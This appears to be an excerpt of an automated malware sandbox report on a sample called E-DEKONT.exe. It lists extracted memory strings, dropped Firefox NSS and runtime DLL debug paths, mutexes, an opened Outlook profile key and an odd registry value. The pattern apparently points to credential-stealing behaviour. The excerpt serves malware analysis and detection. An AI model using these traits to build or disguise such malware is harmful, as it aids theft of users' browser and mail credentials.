Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:304:WilStaging_02
Source: C:\Users\user\Desktop\E-DEKONT.exe Mutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-705FBD2D-EEC696EC
Source: C:\Users\user\Desktop\E-DEKONT.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Jump to behavior
Source: C:\Users\user\Desktop\E-DEKONT.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\Fouragen Jump to behavior
Source: E-DEKONT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source: Binary string: mshtml.pdbUGP source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108910928044.000000001DDD4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108954916729.000000001DAB8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919075540.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108919898776.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108895399238.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928405341.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
